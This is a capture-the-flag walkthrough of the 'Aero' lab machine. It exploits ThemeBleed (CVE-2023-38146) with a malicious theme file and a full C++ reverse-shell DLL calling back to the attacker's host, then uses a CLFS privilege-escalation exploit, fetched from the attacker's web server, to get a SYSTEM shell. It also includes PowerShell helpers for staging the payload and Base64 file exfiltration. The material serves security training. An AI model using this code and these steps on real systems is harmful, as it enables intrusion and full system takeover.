Aero

Box info

Enumeration

Nmap

Let's start by enumerating ports using Nmap:

szczygielka@hacks$  nmap -sVC -p- 10.129.229.128
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-21 18:40 EST
Nmap scan report for 10.129.229.128
Host is up (0.037s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Aero Theme Hub
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 115.49 seconds

The scan shows a single open port: 80/tcp, served by Microsoft IIS 10.0. Every other port is filtered (no response), which is also why the full-range scan took almost two minutes.

Exploring website

After entering the IP address of the machine in the browser, we get the following page:

The description on the webpage indicates that the website is intended to allow users to upload themes for Windows 11 operating system:

According to Microsoft's documentation, Windows theme files use the .theme or .themepack extension. Let's move on to the file upload:

Let's find an example .theme file (in our case aero.theme) and upload it to the website:

The upload works. Attempts to upload a file with an extension other than .theme or .themepack fail:

Let's search the Internet for information related to vulnerabilities connected with using theme files.

CVE-2023-38146

The search leads to CVE-2023-38146, better known as ThemeBleed, which affects Windows 11. Microsoft's advisory classifies it as remote code execution: a crafted .theme file can point the theme loader at an attacker-controlled SMB share, and the loader ends up fetching and loading a DLL from that share. The underlying bug is a time-of-check/time-of-use race: Windows reads the file from the share more than once (a version check, a signature check, then LoadLibrary), and the attacker's SMB server can return a different file on each read.

Exploitation

We do not know the exact Windows version yet, but Microsoft-IIS/10.0 ships with Windows 10 / Windows Server 2016 and later, so Windows 11 is plausible; the version banner we get once we have a shell will settle it. Let's look for an exploit for the vulnerability we found.

PoC

The code exploiting the vulnerability can be found in the following repository:

Let's download the release of this repository first. The ThemeBleed.zip file we downloaded contains the following files:

szczygielka@hacks$ find . -type f -exec file {} \;
./ThemeBleed.pdb: MSVC program database ver 7.00, 512*95 bytes
./ThemeBleed.exe: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows, 3 sections
./SMBLibrary.Win32.dll: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows, 3 sections
./data/stage_1: PE32+ executable (DLL) (console) x86-64, for MS Windows, 2 sections
./data/stage_2: PE32+ executable (DLL) (console) x86-64, for MS Windows, 2 sections
./data/stage_3: PE32+ executable (DLL) (console) x86-64, for MS Windows, 7 sections
./SMBLibrary.dll: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows, 3 sections

The README states that ThemeBleed.exe does three things: start the SMB server, generate a .theme file referencing a given host, or generate a .themepack file referencing a given host. The data directory holds three binaries, stage_1, stage_2 and stage_3, which the server hands out in turn for the version check, the signature check and the final LoadLibrary. To deliver our own payload we build a DLL that exports a function named VerifyThemeVersion and replace data/stage_3 with it.

We want the DLL to give us a reverse shell. To build it we switch from the Linux VM to a Windows VM with Visual Studio installed. A walkthrough on creating your own DLL with Visual Studio can be found here.

Let's open Visual Studio, select Create new project and then choose Dynamic-Link Library (DLL):

Let's name our solution stage_3. After creating the solution we should have the following files:

Let's add the rev_shell.cpp and rev_shell.h files to our project. After adding them, the project structure should look like this:

According to the exploit repository, VerifyThemeVersion must be exported by name, so we declare it in rev_shell.h with extern "C" (so the name is not C++-mangled) and __declspec(dllexport). Microsoft's documentation covers this. After adding the export, rev_shell.h looks as follows:

#pragma once
extern "C" __declspec(dllexport) int VerifyThemeVersion(void);

Let's include rev_shell.h in the pch.h file. The pch.h file after including the header file:

// pch.h: This is a precompiled header file.
// Files listed below are compiled only once, improving build performance for future builds.
// This also affects IntelliSense performance, including code completion and many code browsing features.
// However, files listed here are ALL re-compiled if any one of them is updated between builds.
// Do not add files here that you will be updating frequently as this negates the performance advantage.

#ifndef PCH_H
#define PCH_H

// add headers that you want to pre-compile here
#include "framework.h"
#include "rev_shell.h"

#endif //PCH_H

Let's move to rev_shell.cpp. We need C++ code for a Windows reverse shell; we will adapt the code from the following repository:

After adapting it to our case (the listener address and port must match the ncat listener we start later; cmd.exe is spawned with its standard handles bound to the socket), rev_shell.cpp looks as follows:

#include "pch.h"
#include <stdio.h>
#include <string.h>
#include <process.h>
#include <winsock2.h>
#include <ws2tcpip.h>
#include "rev_shell.h"

#pragma comment(lib, "Ws2_32.lib")

// Attacker VM; the port has to match the ncat listener (started below on 2222).
#define REMOTE_ADDR "10.10.16.15"
#define REMOTE_PORT "2222"

// Exported entry point: ThemeBleed's stage_3 is loaded with LoadLibrary and this
// function is then called by name, so it must be exported undecorated (see rev_shell.h).
int VerifyThemeVersion(void)
{
	FreeConsole();
	WSADATA wsaData;
	if (WSAStartup(MAKEWORD(2, 2), &wsaData) != 0)
		return 1;

	// Resolve the listener (IPv4 or IPv6, TCP).
	struct addrinfo* result = NULL, hints;
	memset(&hints, 0, sizeof(hints));
	hints.ai_family = AF_UNSPEC;
	hints.ai_socktype = SOCK_STREAM;
	hints.ai_protocol = IPPROTO_TCP;
	if (getaddrinfo(REMOTE_ADDR, REMOTE_PORT, &hints, &result) != 0 || result == NULL) {
		WSACleanup();
		return 1;
	}

	// WSASocket with flags 0 gives a non-overlapped socket; that is what makes the
	// handle usable as cmd.exe's stdin/stdout/stderr (socket() would be overlapped).
	SOCKET ConnectSocket = WSASocket(result->ai_family, result->ai_socktype, result->ai_protocol, NULL, 0, 0);
	if (ConnectSocket == INVALID_SOCKET ||
	    connect(ConnectSocket, result->ai_addr, (int)result->ai_addrlen) == SOCKET_ERROR) {
		freeaddrinfo(result);
		WSACleanup();
		return 1;
	}
	freeaddrinfo(result);

	// Spawn a hidden cmd.exe whose three standard handles are the connected socket.
	STARTUPINFO si;
	PROCESS_INFORMATION pi;
	ZeroMemory(&si, sizeof(si));
	si.cb = sizeof(si);
	ZeroMemory(&pi, sizeof(pi));
	si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
	si.wShowWindow = SW_HIDE;
	si.hStdInput = (HANDLE)ConnectSocket;
	si.hStdOutput = (HANDLE)ConnectSocket;
	si.hStdError = (HANDLE)ConnectSocket;
	TCHAR cmd[] = TEXT("C:\\WINDOWS\\SYSTEM32\\CMD.EXE");
	if (CreateProcess(NULL, cmd, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi)) {
		// Block until the shell exits so the loading process keeps the socket alive.
		WaitForSingleObject(pi.hProcess, INFINITE);
		CloseHandle(pi.hProcess);
		CloseHandle(pi.hThread);
	}
	closesocket(ConnectSocket);
	WSACleanup();
	return 0;
}
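Before dropping the build output over data\stage_3 it is worth checking two things that silently break the chain: the DLL must be a 64-bit image (the original stage_3 is PE32+ x86-64, as the file output above shows) and it must export VerifyThemeVersion undecorated. The PowerShell below is an added example, not part of the ThemeBleed repository; it reads the PE export table directly so it does not need dumpbin on the PATH. The build-output path and the ThemeBleed directory are assumptions.

```powershell
# Added example, not from the ThemeBleed repository: validate the built DLL and install it as data\stage_3.
function Get-PeExportInfo {
    param([Parameter(Mandatory)][string]$Path)
    $b  = [IO.File]::ReadAllBytes((Resolve-Path $Path).Path)
    $pe = [BitConverter]::ToInt32($b, 0x3C)                                   # e_lfanew
    if ([BitConverter]::ToUInt32($b, $pe) -ne 0x00004550) { throw "$Path is not a PE image" }   # "PE\0\0"
    $machine = [BitConverter]::ToUInt16($b, $pe + 4)                          # IMAGE_FILE_HEADER.Machine
    $nSect   = [BitConverter]::ToUInt16($b, $pe + 6)
    $optSize = [BitConverter]::ToUInt16($b, $pe + 20)
    $opt     = $pe + 24
    $magic   = [BitConverter]::ToUInt16($b, $opt)                             # 0x20B = PE32+, 0x10B = PE32
    $dirOff  = if ($magic -eq 0x20B) { 0x70 } else { 0x60 }                  # export data directory offset
    $expRva  = [BitConverter]::ToUInt32($b, $opt + $dirOff)

    # Section table, used to translate RVAs into file offsets.
    $sections = for ($i = 0; $i -lt $nSect; $i++) {
        $s = $opt + $optSize + 40 * $i
        [pscustomobject]@{
            VA  = [BitConverter]::ToUInt32($b, $s + 12)
            Raw = [BitConverter]::ToUInt32($b, $s + 20)
            Len = [Math]::Max([BitConverter]::ToUInt32($b, $s + 8), [BitConverter]::ToUInt32($b, $s + 16))
        }
    }
    function ToOffset([uint32]$rva) {
        $sec = $sections | Where-Object { $rva -ge $_.VA -and $rva -lt ($_.VA + $_.Len) } | Select-Object -First 1
        if (-not $sec) { throw ("RVA 0x{0:X} is outside every section" -f $rva) }
        [int]($rva - $sec.VA + $sec.Raw)
    }

    $names = @()
    if ($expRva -ne 0) {
        $exp      = ToOffset $expRva
        $nNames   = [BitConverter]::ToUInt32($b, $exp + 24)                   # IMAGE_EXPORT_DIRECTORY.NumberOfNames
        $namesOff = ToOffset ([BitConverter]::ToUInt32($b, $exp + 32))        # AddressOfNames
        for ($i = 0; $i -lt $nNames; $i++) {
            $strOff = ToOffset ([BitConverter]::ToUInt32($b, $namesOff + 4 * $i))
            $end    = [Array]::IndexOf($b, [byte]0, $strOff)
            $names += [Text.Encoding]::ASCII.GetString($b, $strOff, $end - $strOff)
        }
    }
    [pscustomobject]@{ Is64Bit = ($machine -eq 0x8664); Exports = $names }
}

function Install-Stage3 {
    param(
        [Parameter(Mandatory)][string]$DllPath,                                # e.g. .\stage_3\x64\Release\stage_3.dll (assumed)
        [string]$ThemeBleedDir = "$env:USERPROFILE\Documents\ThemeBleed"       # where ThemeBleed.zip was unpacked (assumed)
    )
    $info = Get-PeExportInfo -Path $DllPath
    if (-not $info.Is64Bit) { throw 'Build the DLL for x64: the original stage_3 is a PE32+ (x86-64) image' }
    if ($info.Exports -notcontains 'VerifyThemeVersion') {
        throw "No undecorated export 'VerifyThemeVersion' (found: $($info.Exports -join ', ')); check extern ""C"" and __declspec(dllexport)"
    }
    $dest = Join-Path $ThemeBleedDir 'data\stage_3'
    if (-not (Test-Path "$dest.orig")) { Copy-Item $dest "$dest.orig" }      # keep the repository's own stage_3
    Copy-Item $DllPath $dest -Force
    "Installed $DllPath as $dest (x64, exports VerifyThemeVersion)"
}

Install-Stage3 -DllPath .\stage_3\x64\Release\stage_3.dll
```

A mangled name such as ?VerifyThemeVersion@@YAHXZ in the export list means the extern "C" declaration was not visible when the function was compiled; a PE32 (32-bit) image means the active Visual Studio configuration was x86 rather than x64.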

The exploit's SMB server binds port 445, so before starting it we have to make sure nothing else on the Windows VM is listening there. Port 445 is normally held by Windows' own SMB server, which shows up under PID 4 (System):

PS C:\Users\Szczygielka\Documents> netstat -aon | findstr 445
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    [::]:445               [::]:0                 LISTENING       4
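The same check, as an added PowerShell example rather than something from the original write-up: it reports who owns port 445 and, when it is the built-in SMB server, disables the Server service (LanmanServer) so that the port is free after the next reboot. It needs an elevated prompt.

```powershell
# Added example: find out what holds 445 on the Windows VM and disable the built-in SMB server if needed.
function Test-Port445Free {
    # Returns $true when nothing listens on 445. PID 4 is System, i.e. the in-kernel SMB
    # server that the LanmanServer ("Server") service controls.
    $listeners = @(Get-NetTCPConnection -LocalPort 445 -State Listen -ErrorAction SilentlyContinue)
    if ($listeners.Count -eq 0) { return $true }
    foreach ($l in $listeners) {
        $owner = if ($l.OwningProcess -eq 4) { 'System / LanmanServer' } else { (Get-Process -Id $l.OwningProcess).ProcessName }
        Write-Warning ("{0}:{1} is held by PID {2} ({3})" -f $l.LocalAddress, $l.LocalPort, $l.OwningProcess, $owner)
    }
    return $false
}

function Disable-SmbServer {
    # Stopping the service alone does not reliably release the port; with the startup type
    # set to Disabled the VM comes back from a reboot with 445 free.
    Set-Service -Name LanmanServer -StartupType Disabled
    Stop-Service -Name LanmanServer -Force -ErrorAction SilentlyContinue
    Write-Host 'LanmanServer disabled. Reboot, then run Test-Port445Free again before starting ThemeBleed.exe server.'
}

if (-not (Test-Port445Free)) { Disable-SmbServer }
```

When you are done with the box, put the service back with Set-Service -Name LanmanServer -StartupType Automatic, otherwise file sharing on the VM stays broken.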

To free port 445 we set the startup type of the Server service (LanmanServer) to Disabled and reboot the Windows VM. After that, we generate a malicious aero.theme that points at our VM (10.10.16.15) via the following command:

PS C:\Users\Szczygielka\Documents\ThemeBleed> .\ThemeBleed.exe make_theme 10.10.16.15 aero.theme

Let's start the server:

PS C:\Users\Szczygielka\Documents\ThemeBleed> .\ThemeBleed.exe server
Server started

And let's run listener:

PS C:\Users\Szczygielka\Documents> .\ncat.exe -lnvp 2222
Ncat: Version 5.59BETA1 ( http://nmap.org/ncat )
Ncat: Listening on 0.0.0.0:2222

Now upload the prepared aero.theme file to the webpage:

In the server console we can see the client walking through all three stages; the last line confirms that our stage_3 library was fetched for LoadLibrary:

PS C:\Users\Szczygielka\Documents\ThemeBleed> .\ThemeBleed.exe server
Server started
Client requested stage 1 - Version check
Client requested stage 1 - Version check
Client requested stage 1 - Version check
Client requested stage 1 - Version check
Client requested stage 1 - Version check
Client requested stage 1 - Version check
Client requested stage 1 - Version check
Client requested stage 2 - Verify signature
Client requested stage 2 - Verify signature
Client requested stage 2 - Verify signature
Client requested stage 2 - Verify signature
Client requested stage 2 - Verify signature
Client requested stage 2 - Verify signature
Client requested stage 3 - LoadLibrary

Let's check if we managed to get the reverse shell:

PS C:\Users\Szczygielka\Documents> .\ncat.exe -lnvp 2222
Ncat: Version 5.59BETA1 ( http://nmap.org/ncat )
Ncat: Listening on 0.0.0.0:2222
Ncat: Connection from 10.129.229.128:49679.
Microsoft Windows [Version 10.0.22000.1761]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>

Success! The banner (10.0.22000.1761) confirms we are on Windows 11 21H2, and the shell runs as the user sam.emerson:

C:\Windows\system32>whoami
whoami
aero\sam.emerson

User flag

The user flag can be obtained from C:\Users\sam.emerson\Desktop\user.txt.

Privilege escalation

In sam.emerson's Documents folder we find a PDF whose name refers to a CVE:

C:\Users\sam.emerson\Documents>dir
 Volume in drive C has no label.
 Volume Serial Number is C009-0DB2

 Directory of C:\Users\sam.emerson\Documents

09/21/2023  01:58 PM    <DIR>          .
09/20/2023  04:08 AM    <DIR>          ..
09/21/2023  08:18 AM            14,158 CVE-2023-28252_Summary.pdf
09/26/2023  12:06 PM             1,113 watchdog.ps1
               2 File(s)         15,271 bytes
               2 Dir(s)   6,129,287,168 bytes free

The easiest way to retrieve CVE-2023-28252_Summary.pdf is to Base64-encode it on the target and decode the text with CyberChef. Let's switch the console to PowerShell and encode the file with the following command:

PS C:\Users\sam.emerson\Documents> [convert]::ToBase64String((Get-Content -path "CVE-2023-28252_Summary.pdf" -Encoding byte))
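As an alternative to CyberChef, the transfer can be done end to end in PowerShell, with a hash check to catch the usual failure (a long Base64 blob truncated or line-wrapped when copied out of the shell). This is an added example, not part of the original write-up; file names are assumptions. The first function runs on the target, the second on the attacking VM.

```powershell
# Added example: Base64 a file on the target, rebuild it on the attacker's side, verify SHA-256.
function ConvertTo-Base64File {
    param([Parameter(Mandatory)][string]$Path)
    # Windows PowerShell 5.1 (the target's shell) takes -Encoding Byte;
    # PowerShell 7 removed that value and uses -AsByteStream instead.
    $bytes = if ($PSVersionTable.PSVersion.Major -ge 6) {
        Get-Content -Path $Path -AsByteStream -ReadCount 0
    } else {
        Get-Content -Path $Path -Encoding Byte -ReadCount 0
    }
    [pscustomobject]@{
        Sha256 = (Get-FileHash -Path $Path -Algorithm SHA256).Hash
        Base64 = [Convert]::ToBase64String([byte[]]$bytes)
    }
}

function ConvertFrom-Base64File {
    param(
        [Parameter(Mandatory)][string]$Base64,
        [Parameter(Mandatory)][string]$OutFile,
        [string]$ExpectedSha256
    )
    # Copying from a terminal adds line breaks and stray prompt text; keep only Base64 characters.
    $clean = $Base64 -replace '[^A-Za-z0-9+/=]', ''
    # .NET's working directory is not PowerShell's, so resolve relative paths explicitly.
    if (-not [IO.Path]::IsPathRooted($OutFile)) { $OutFile = Join-Path $PWD.Path $OutFile }
    [IO.File]::WriteAllBytes($OutFile, [Convert]::FromBase64String($clean))
    $hash = (Get-FileHash -Path $OutFile -Algorithm SHA256).Hash
    if ($ExpectedSha256 -and $hash -ne $ExpectedSha256) {
        throw "SHA-256 mismatch ($hash vs $ExpectedSha256): the paste was truncated or corrupted"
    }
    $hash
}

# On the target (assumed file name):
#   ConvertTo-Base64File .\CVE-2023-28252_Summary.pdf | Format-List
# On the attacking VM, with the two values pasted from the target:
#   ConvertFrom-Base64File -Base64 '<pasted Base64>' -OutFile CVE-2023-28252_Summary.pdf -ExpectedSha256 '<pasted hash>'
```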

Use the CyberChef to decode it from Base64:

Now save the file as CVE-2023-28252_Summary.pdf. Let's check its contents:

The PDF describes CVE-2023-28252, a vulnerability in the Windows Common Log File System (CLFS) driver that allows local privilege escalation, and mentions a security patch released by Microsoft in April 2023. Internet search results confirm that the patch shipped on April 11, 2023 and that Windows 11 is among the affected versions.

Let's look for an exploit for this vulnerability:

Let's download the contents of the repository to the attacking virtual machine and open the solution using Visual Studio:

The solution contains a single source file, clfs_eop.cpp. Let's analyze its code:

At the end of the file, notepad.exe is launched once the privilege escalation succeeds. We want to swap that payload for one that gives us a reverse shell as SYSTEM. We will use the PowerShell #3 (Base64) payload from this website; don't forget to change the IP address and port number. Paste the resulting command into the code in place of notepad.exe, and build the project in Release.

Now let's go to the directory where the compiled executable file clfs_eop.exe is located, and run a Python HTTP server:

PS C:\Users\Szczygielka\Documents\CVE-2023-28252-master\x64\Release> python -m http.server 10000
Serving HTTP on :: port 10000 (http://[::]:10000/) ...

Let's move to our target machine and download clfs_eop.exe with the following command (in Windows PowerShell, wget is an alias for Invoke-WebRequest):

wget http://10.10.16.15:10000/clfs_eop.exe -OutFile clfs_eop.exe

The file was downloaded:

PS C:\Users\Szczygielka\Documents\CVE-2023-28252-master\x64\Release> python -m http.server 10000
Serving HTTP on :: port 10000 (http://[::]:10000/) ...
::ffff:10.129.229.128 - - [23/Feb/2024 15:46:07] "GET /clfs_eop.exe HTTP/1.1" 200 -

Let's prepare the listener:

PS C:\Users\Szczygielka\Documents> .\ncat.exe -lnvp 8080
Ncat: Version 5.59BETA1 ( http://nmap.org/ncat )
Ncat: Listening on 0.0.0.0:8080

And let's execute clfs_eop.exe on the target machine:

PS C:\Users\sam.emerson\Documents> .\clfs_eop.exe
[+] Incorrect number of arguments ... using default value 1208 and flag 1 for w11 and w10

In the listener, we received a connection:

PS C:\Users\Szczygielka\Documents> .\ncat.exe -lnvp 8080
Ncat: Version 5.59BETA1 ( http://nmap.org/ncat )
Ncat: Listening on 0.0.0.0:8080
Ncat: Connection from 10.129.229.128:65249.
PS C:\Users\sam.emerson>

Let's check which user we are:

PS C:\Users\sam.emerson> whoami
nt authority\system

Root flag

The root flag can be obtained from the following location C:\Users\Administrator\Desktop\root.txt.
